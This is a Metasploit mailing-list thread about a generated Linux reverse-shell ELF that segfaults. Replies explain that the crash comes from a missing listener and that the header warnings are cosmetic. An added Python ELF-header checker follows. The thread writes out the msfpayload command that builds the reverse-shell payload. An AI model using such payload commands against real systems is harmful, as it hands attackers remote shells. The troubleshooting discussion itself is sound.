Metasploit mailing list archives

Re: Linux payloads broken
From: Konrads Smelkovs <konrads () smelkovs com>
Date: Sat, 8 May 2010 15:33:56 +0300

You are right, with listener it works. Don't know what happened to my
strace earlier.

2010/5/7, egypt () metasploit com <egypt () metasploit com>:
The "corrupt" headers are an artifact of how we create ELF
executables.  If you want to see how that works look at
data/templates/src/elf/exe/elf_template.s

When I run an elf generated with the same command you posted under
strace, it clearly calls socket() and connect() before dying.  When a
listener is waiting to accept that connection, it works fine.  The
segfault you're seeing, as Ramon and Florian have pointed out, is due
to a failed connect.

Hope this helped,
egypt

On Fri, May 7, 2010 at 9:00 AM, Konrads Smelkovs <konrads () smelkovs com>
wrote:
Strace shows that it segfaults before any syscalls are placed. Furthermore,
it appears that exec headers are corrupt. Whether I have a listener or not on
the other end doesn't matter.

--
Konrads Smelkovs
Applied IT sorcery.


On Fri, May 7, 2010 at 3:53 PM, Ramon de Carvalho Valle
<ramon () metasploit com> wrote:

Did you set a listener on the selected port?

-Ramon


On 05/07/2010 05:21 AM, Konrads Smelkovs wrote:
konrads@konrads-laptop:~/msf2$ ./msfpayload linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=80 X >out.elf
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell_reverse_tcp
 Length: 71
Options: LHOST=127.0.0.1,LPORT=80
konrads@konrads-laptop:~/msf2$ file out.elf
out.elf: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, *corrupted section header size*
konrads@konrads-laptop:~/msf2$ chmod +x out.elf
konrads@konrads-laptop:~/msf2$ ./out.elf
*Segmentation fault*
konrads@konrads-laptop:~/msf2$ uname -a
Linux konrads-laptop 2.6.31-20-generic #58-Ubuntu SMP Fri Mar 12 05:23:09 UTC 2010 i686 GNU/Linux


Same for metsvc_reverse_tcp payload
--
Konrads Smelkovs
Applied IT sorcery.




_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

-- 
Sent from my mobile device

--
Konrads Smelkovs
Applied IT sorcery.
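
Added example, not part of the thread and not Metasploit's code: an ELF32 header check that separates section-header oddities of the kind `file` flagged above from program-header faults that would actually stop the kernel from loading the image. The sample image and the names `triage_elf32` and `build_sample` are constructed for illustration; its zeroed section-header fields are an assumption, not values taken from elf_template.s.

```python
import struct

EHDR = struct.Struct("<16sHHIIIIIHHHHHH")  # Elf32_Ehdr, 52 bytes
PHDR = struct.Struct("<8I")                # Elf32_Phdr, 32 bytes
SHDR_SIZE, PT_LOAD = 40, 1                 # sizeof(Elf32_Shdr), loadable segment type

def triage_elf32(data):
    """Return (loadable, notes): separates cosmetic section-header oddities
    from program-header faults that would actually stop the kernel loader."""
    if len(data) < EHDR.size or data[:6] != b"\x7fELF\x01\x01":
        return False, ["not a 32-bit little-endian ELF"]
    (_, _, _, _, e_entry, e_phoff, e_shoff, _, _,
     e_phentsize, e_phnum, e_shentsize, e_shnum, _) = EHDR.unpack_from(data)
    notes = []
    # Section headers serve linkers and debuggers; the loader ignores them.
    if e_shentsize != SHDR_SIZE:
        notes.append("section header entry size %d, expected %d" % (e_shentsize, SHDR_SIZE))
    if e_shoff == 0 or e_shnum == 0:
        notes.append("no section header table")
    # Program headers are what execve() needs.
    if e_phentsize != PHDR.size or e_phnum == 0:
        return False, notes + ["unusable program header table"]
    if e_phoff + e_phnum * PHDR.size > len(data):
        return False, notes + ["program header table truncated"]
    for i in range(e_phnum):
        p_type, p_offset, p_vaddr, _, p_filesz, p_memsz, _, _ = \
            PHDR.unpack_from(data, e_phoff + i * PHDR.size)
        if p_type == PT_LOAD and p_vaddr <= e_entry < p_vaddr + p_memsz:
            if p_offset + p_filesz > len(data):
                return False, notes + ["PT_LOAD extends past end of file"]
            return True, notes
    return False, notes + ["entry point not inside any PT_LOAD segment"]

def build_sample(e_shentsize=0, e_phnum=1):
    """Constructed input: one PT_LOAD segment, no section table, 4 filler bytes."""
    base, size = 0x08048000, EHDR.size + PHDR.size + 4
    ident = b"\x7fELF\x01\x01\x01" + b"\x00" * 9
    ehdr = EHDR.pack(ident, 2, 3, 1, base + EHDR.size + PHDR.size, EHDR.size,
                     0, 0, EHDR.size, PHDR.size, e_phnum, e_shentsize, 0, 0)
    phdr = PHDR.pack(PT_LOAD, 0, base, base, size, size, 7, 0x1000)
    return ehdr + phdr + b"\x00" * 4

if __name__ == "__main__":
    print(triage_elf32(build_sample()))
```

A result of `(True, [...])` with only section-header notes means the header warning is not the cause of a crash, which points the investigation at runtime behaviour such as the failed connect described in the thread.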